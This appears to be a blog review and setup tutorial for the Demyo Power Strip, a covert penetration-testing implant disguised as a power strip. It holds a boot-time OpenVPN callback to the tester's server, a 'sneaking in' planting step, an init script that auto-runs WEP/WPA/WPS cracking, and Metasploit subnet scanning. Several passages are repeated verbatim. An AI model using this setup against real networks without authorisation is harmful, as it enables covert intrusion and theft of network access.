Summary
Let's see if this silicon blade is sharp enough to cut through the security cheese!
Some intros: The Demyo Power Strip (DPS) is a covert penetration testing device built by Demyo Sec made to be used for penetration tests. While not being the first of its kind out there, is a strong competitor to other existing tools, such as Power Pwn, and the PlugBot etc. The DPS gives you the ability to launch attacks over ethernet, WiFi and Bluetooth.
Some intros: The Demyo Power Strip (DPS) is a covert penetration testing device built by Demyo Sec made to be used for penetration tests. While not being the first of its kind out there, is a strong competitor to other existing tools, such as Power Pwn, and the PlugBot etc. The DPS gives you the ability to launch attacks over ethernet, WiFi and Bluetooth.
Features
- Based on Raspberry Pi
- CPU 700Mhz, boostable to 1Ghz, 512MB RAM, 32GB SD
- Ethernet (10/100), WiFi b/g/n and Bluetooth connectivity
- Runs Debian Linux
- CLI (via SSH) and GUI (via VNC)
- Physical dimensions 14″ x 2.25″ x 8.25″ or 35.56cm x 5.72cm x 20.96cm
- Actually functions as a real power strip
Default Installed Tools
Some of the relevant packages installed:- Nmap
- OpenVPN
- w3af
- aircrack-ng
- btscanner
- ophcrack
- John the Ripper password cracker
- and many more...
Getting Ready
Connecting for the First Time
Installing Your Preferred Tools
Installing your preferred toolset can be easy as 1-2-3 thanks to the Debian flavor of Linux running on the DPS. Just run apt-get install for your favorite tool.
Installing the Metasploit Framework
To setup Metasploit you should run the following commands:
- wget http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
- tar -xvvf framework-latest.tar.bz2
- apt-get update
- apt-get dist-upgrade (can take a bit)
- apt-get install postgresql-9.1 postgresql-client-9.1 postgresql-contrib-9.1 postgresql-doc-9.1 postgresql-server-dev-9.1
- gem install pg
Setting up a OpenVPN Server
For the DPS to connect back, I chose the OpenVPN route. You can easily setup a OpenVPN server on Amazon EC2 as described here (I used Ubuntu as a server).
The server setup:
The server setup:
| port 1194 |
| proto tcp-server |
| dev tun1 |
| ifconfig 10.4.0.1 10.4.0.2 |
| status server-tcp.log |
| verb 3 |
| secret ovpn.key |
| daemon |
Setting up OpenVPN on the DPS
Now that we have a server to connect back to, let's setup the DPS to auto connect to this server.
The DPS OpenVPN client configuration:
dev tun
proto tcp-client
remote <INSERT IP OR HOSTNAME>
port 1194
ifconfig 10.4.0.2 10.4.0.1
redirect-gateway def1
keepalive 10 60
secret ovpn.key
verb 3
mute 10
To setup auto connect on boot simply run "service openvpn start" after adding the key and configuration files.
The DPS OpenVPN client configuration:
dev tun
proto tcp-client
remote <INSERT IP OR HOSTNAME>
port 1194
ifconfig 10.4.0.2 10.4.0.1
redirect-gateway def1
keepalive 10 60
secret ovpn.key
verb 3
mute 10
To setup auto connect on boot simply run "service openvpn start" after adding the key and configuration files.
Sneaking In
Now all you need to do is walk into the location of interest, plugin the DPS and wait for it to connect back to your OpenVPN server. For the DPS to connect back you, will either need to connect a network cable or let it find an available WiFi access point (AP). If there are no open WiFi APs, we can setup the DPS to brute force the PSK via aircrack-ng. You'll have to take a lengthy break for this scenario cause it may be a while for the cracking to succeed.
w00t w00t! Seeing the DPS Connect
You can run netstat to find an established connection or look at /var/log/syslog to track the OpenVPN logs. Due to our simple OpenVPN setup, the DPS will be at 10.4.0.2. Now we can SSH into it and go to town!Automating WEP/WPA/WPS cracking with Wifite and Reaver
Installing the tools:
- wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py && chmod +x wifite.py
- wget http://static.hackersgarage.com/darkc0de.lst.gz && gunzip darkc0de.lst.gz
- sudo apt-get install sqlite3 libsqlite3-dev gcc-4.7
- svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
- cd reaver-wps-read-only && ./configure && make && make install
Wifite comes with Reaver/WPS integration so all you have to do is run Wifite as:
- ./wifite.py -all
This will make Wifite perform all three types of attacks (WEP/WPA/WPS).
You can also configure Wifite to start on boot as a service by doing the following:
- nano /etc/init.d/wcracker
- Add the following code:
- update-rc.d wcracker defaults
- And reboot
### BEGIN INIT INFO
# Provides: Wcracker Service
# Required-Start: $local_fs $network $remote_fs $syslog
# Required-Stop: $local_fs $network $remote_fs $syslog
# Default-Start:
# Default-Stop:
# X-Interactive: true
# Short-Description: Start/stop Wcracker Service
### END INIT INFO
export USER='root'
eval cd ~$USER
case "$1" in
start)
# Start the wifi cracker
su $USER -c '/root/wifite.py -all -dict /root/darkc0de.lst'
echo "Starting wireless cracking for $USER "
;;
stop)
# if it's stop, then just kill the process
pkill wifite.py
echo "wireless cracking stopped"
;;
*)
echo "Usage: /etc/init.d/wcracker {start|stop}"
exit 1
;;
esac
exit 0
Some Snooping Around with Metasploit
Create a database (e.g. msf) in your Postgres installation then launch Metasploit to connect and populate the database and module cache.
cd msf3
./msfconsole
msf > db_connect postgres:password@localhost/msf
You can scan the environment for potential targets using modules, such as auxiliary/scanner/smb/smb_version or build a database of targets with nmap and launch attacks.
msf > db_nmap -v -sV 192.168.1.0/24
The command above builds a database of the scanned network that can be used later on.
To get more in depth information about how to use Metasploit you can visit the Offensive Security web site.
You can scan the environment for potential targets using modules, such as auxiliary/scanner/smb/smb_version or build a database of targets with nmap and launch attacks.
msf > db_nmap -v -sV 192.168.1.0/24
The command above builds a database of the scanned network that can be used later on.
To get more in depth information about how to use Metasploit you can visit the Offensive Security web site.
Conclusion
Overall, the DPS appears to be a decent covert platform to perform penetration testing. It doesn't physically appear suspicious as other similar devices, especially with an ethernet cable sticking out. The OS is flexible enough to rapidly install or compile non-default tools. It would be great if it had a 3G modem and I heard from Demyo Sec that it will be present in the next release.
Can you build this device yourself and spend countless hours soldering and testing? Maybe... OR you can dish out $750 and be on your way to pen tester stardom!
You can get more information from Demyo Sec's web site.
Can you build this device yourself and spend countless hours soldering and testing? Maybe... OR you can dish out $750 and be on your way to pen tester stardom!
You can get more information from Demyo Sec's web site.
Disclaimer
The material and actions described here are for educational purposes only.
No comments:
Post a Comment